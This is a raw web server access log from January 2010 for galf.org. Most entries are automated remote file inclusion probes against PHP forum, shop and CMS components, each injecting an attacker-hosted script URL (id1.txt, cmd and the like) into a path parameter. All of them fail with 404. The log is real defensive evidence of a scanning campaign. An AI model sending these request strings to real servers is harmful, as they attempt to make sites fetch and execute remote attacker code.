79.170.45.126 - - [31/Jan/2010:22:12:33 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:12:33 -0800] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:12:33 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:14:03 -0800] "GET /logs/access_090907.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:14:03 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:14:03 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:14:21 -0800] "GET /logs/scripts.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:14:39 -0800] "GET /logs/access_091228.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.40.203.226 - - [31/Jan/2010:22:16:32 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.40.203.226 - - [31/Jan/2010:22:16:32 -0800] "GET /logs/access_091130.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.40.203.226 - - [31/Jan/2010:22:16:32 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:16:42 -0800] "GET /logs/access_090706.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.40.203.226 - - [31/Jan/2010:22:18:31 -0800] "GET /logs/access_091130.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.40.203.226 - - [31/Jan/2010:22:18:55 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
188.40.203.226 - - [31/Jan/2010:22:18:55 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
188.40.203.226 - - [31/Jan/2010:22:18:55 -0800] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.170.45.126 - - [31/Jan/2010:22:19:34 -0800] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.flashweb.co.il/mambo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.48.18.241 - - [31/Jan/2010:22:23:06 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.48.18.241 - - [31/Jan/2010:22:23:07 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.48.18.241 - - [31/Jan/2010:22:23:08 -0800] "GET /logs/access_091130.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:22:25:19 -0800] "GET /logs/access_090817.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:22:25:19 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:22:25:19 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:25:21 -0800] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:22:25:24 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:22:25:24 -0800] "GET /logs/access_090817.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:22:25:24 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:22:26:14 -0800] "GET /logs/access_091012.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:22:27:57 -0800] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:22:27:57 -0800] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:22:27:57 -0800] "GET /logs/access_090928.log%20%20//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [31/Jan/2010:22:28:09 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [31/Jan/2010:22:28:09 -0800] "GET /logs/access_091130.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [31/Jan/2010:22:28:09 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [31/Jan/2010:22:29:11 -0800] "GET /logs//modules/Forums/admin/admin_users=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [31/Jan/2010:22:29:11 -0800] "GET /logs/access.log%20%20//modules/Forums/admin/admin_users=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [31/Jan/2010:22:29:11 -0800] "GET /modules/Forums/admin/admin_users=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [31/Jan/2010:22:30:09 -0800] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [31/Jan/2010:22:30:09 -0800] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [31/Jan/2010:22:30:09 -0800] "GET /logs/access_090706.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:30:21 -0800] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.flashweb.co.il/mambo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:22:30:34 -0800] "GET /logs/access.log//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:22:30:34 -0800] "GET /bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:22:30:34 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.36.173.93 - - [31/Jan/2010:22:31:21 -0800] "GET /modules/Forums/admin/admin_users=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.36.173.93 - - [31/Jan/2010:22:31:21 -0800] "GET /logs/access.log%20%20//modules/Forums/admin/admin_users=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.36.173.93 - - [31/Jan/2010:22:31:21 -0800] "GET /logs//modules/Forums/admin/admin_users=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:22:31:45 -0800] "GET /bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.67.244.57 - - [31/Jan/2010:22:31:45 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.67.244.57 - - [31/Jan/2010:22:31:45 -0800] "GET /logs/access.log%20%20//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.67.244.57 - - [31/Jan/2010:22:32:40 -0800] "GET /bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:22:32:40 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:22:32:40 -0800] "GET /logs/access_100118.log%20%20//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [31/Jan/2010:22:32:51 -0800] "GET /logs/access.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.55.15.194 - - [31/Jan/2010:22:32:51 -0800] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.55.15.194 - - [31/Jan/2010:22:32:51 -0800] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.67.244.57 - - [31/Jan/2010:22:32:53 -0800] "GET /logs/access_100125.log//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.230.10.251 - - [31/Jan/2010:22:33:11 -0800] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.230.10.251 - - [31/Jan/2010:22:33:12 -0800] "GET /logs/access_090706.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.230.10.251 - - [31/Jan/2010:22:33:12 -0800] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [31/Jan/2010:22:33:30 -0800] "GET /logs/access_090706.log%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [31/Jan/2010:22:33:30 -0800] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [31/Jan/2010:22:33:30 -0800] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.48.18.241 - - [31/Jan/2010:22:34:49 -0800] "GET /logs/access_091130.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:35:02 -0800] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.flashweb.co.il/mambo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.240.113.151 - - [31/Jan/2010:22:35:09 -0800] "GET /bbs/skin/happycast_category_lightblack/setup.php?dir=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
77.240.113.151 - - [31/Jan/2010:22:35:09 -0800] "GET /logs//bbs/skin/happycast_category_lightblack/setup.php?dir=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
77.240.113.151 - - [31/Jan/2010:22:35:10 -0800] "GET /bbs/skin/happycast_category_lightblack/setup.php?dir=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
77.240.113.151 - - [31/Jan/2010:22:35:10 -0800] "GET /logs//bbs/skin/happycast_category_lightblack/setup.php?dir=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:22:35:30 -0800] "GET /logs/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:22:35:30 -0800] "GET /logs/access_090817.log/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:22:35:30 -0800] "GET /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:22:35:32 -0800] "GET /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:22:35:32 -0800] "GET /logs/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:22:35:32 -0800] "GET /logs/access_090817.log/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [31/Jan/2010:22:36:10 -0800] "GET /logs/access.log///write_comment_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [31/Jan/2010:22:36:10 -0800] "GET //write_comment_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [31/Jan/2010:22:36:10 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [31/Jan/2010:22:36:10 -0800] "GET /logs/access.log///write_comment_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [31/Jan/2010:22:36:10 -0800] "GET //write_comment_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [31/Jan/2010:22:36:10 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [31/Jan/2010:22:36:42 -0800] "GET /logs/access_091130.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.48.18.241 - - [31/Jan/2010:22:36:47 -0800] "GET /logs/access_100111.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.230.10.251 - - [31/Jan/2010:22:37:38 -0800] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.230.10.251 - - [31/Jan/2010:22:37:38 -0800] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.230.10.251 - - [31/Jan/2010:22:37:38 -0800] "GET /logs/access_090706.log%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [31/Jan/2010:22:38:00 -0800] "GET /logs/access_100111.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.48.18.241 - - [31/Jan/2010:22:38:54 -0800] "GET /modules/Forums/admin/admin_users=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.48.18.241 - - [31/Jan/2010:22:38:54 -0800] "GET /logs//modules/Forums/admin/admin_users=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.48.18.241 - - [31/Jan/2010:22:38:55 -0800] "GET /logs/access.log%20%20//modules/Forums/admin/admin_users=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:22:40:39 -0800] "GET /logs/access_090928.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:22:41:32 -0800] "GET /logs/access_090817.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
109.123.64.129 - - [31/Jan/2010:22:41:56 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
109.123.64.129 - - [31/Jan/2010:22:41:56 -0800] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
109.123.64.129 - - [31/Jan/2010:22:41:56 -0800] "GET /bbs//delete_all.php?board_skin_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
76.188.203.138 - - [31/Jan/2010:22:44:29 -0800] "GET /labia/ HTTP/1.1" 200 524 "http://www.google.com/search?q=-inurl%3Ahtm+-inurl%3Ahtml+-inurl%3Aasp+intitle%3A%E2%80%9Dindex+of%E2%80%9D+%2Blabia&btnG=Search&hl=en&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&sa=2" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.galf.org"
76.188.203.138 - - [31/Jan/2010:22:44:29 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.galf.org"
76.188.203.138 - - [31/Jan/2010:22:44:30 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.galf.org"
78.137.163.133 - - [31/Jan/2010:22:44:50 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "www.galf.org"
78.137.163.133 - - [31/Jan/2010:22:44:51 -0800] "GET /logs/access_090406.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11" "www.galf.org"
77.79.246.80 - - [31/Jan/2010:22:54:44 -0800] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.79.246.80 - - [31/Jan/2010:22:54:45 -0800] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.79.246.80 - - [31/Jan/2010:22:54:45 -0800] "GET /logs/access.log%20%20//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.79.246.80 - - [31/Jan/2010:22:54:47 -0800] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.43.102.37 - - [31/Jan/2010:22:54:57 -0800] "GET /delete_all.php?board_skin_path=http://www.cmhaniagara.ca/video/pandegaid.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "www.galf.org"
200.207.8.238 - - [31/Jan/2010:22:55:33 -0800] "GET /logs/access_091130.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.207.8.238 - - [31/Jan/2010:22:55:33 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.207.8.238 - - [31/Jan/2010:22:55:33 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.93.149.176 - - [31/Jan/2010:22:56:22 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
208.93.149.176 - - [31/Jan/2010:22:56:22 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
208.93.149.176 - - [31/Jan/2010:22:56:22 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
208.93.149.176 - - [31/Jan/2010:22:56:22 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
